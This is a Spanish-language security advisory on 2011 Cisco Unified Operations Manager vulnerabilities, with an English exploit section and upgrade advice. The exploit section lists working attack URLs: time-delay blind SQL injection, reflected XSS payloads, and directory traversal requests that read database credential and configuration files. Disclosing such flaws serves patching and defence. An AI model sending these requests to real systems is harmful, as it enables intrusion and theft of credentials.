Cisco ha publicado una actualización para Cisco Unified Operations Manager que corrige diversos fallos de seguridad que podrían permitir que un atacante conseguir acceso a información sensible, manipular datos o ejecutar código script.
Se han identificado múltiples vulnerabilidades en Cisco Unified Operations Manager (CUOM), que pueden ser empleadas para inyectar código script o consultas SQL. Los problemas se deben a errores de validación de entradas en "ServerHelpEngine", "PRTestCreation.do", "TelePresenceReportAction.do" y otros scripts, que pueden emplearse para construir ataques de cross site scripting y de inyección SQL.
Los usuarios de Cisco pueden conseguir actualizaciones para estos problemas a través de Software Center en:
http://www.cisco.com/cisco/software/navigator.html?a=a&i=rpm
Información del impacto:
Información referente al exploit:
1. Blind SQL injection vulnerabilities that affect CuOM CVE-2011-0960 (CSCtn61716):
The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call:
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=
Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--
2. Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716):
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
Reflected XSS vulnerability that affect Common Services Device Center CVE-2011-0962 (CSCto12712):
/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)//4e9adfb2987
Reflected XSS vulnerability that affects Common Services Framework Help Servlet CVE-2011-0961 (CSCto12704):
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
3. Directory traversal vulnerability that affects CiscoWorks Homepage CVE-2011-0966 (CSCto35577):
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties
DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\log\dbpwdChange.log
Solution.
Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 and CSCto35577 for information on patches and availability of fixes.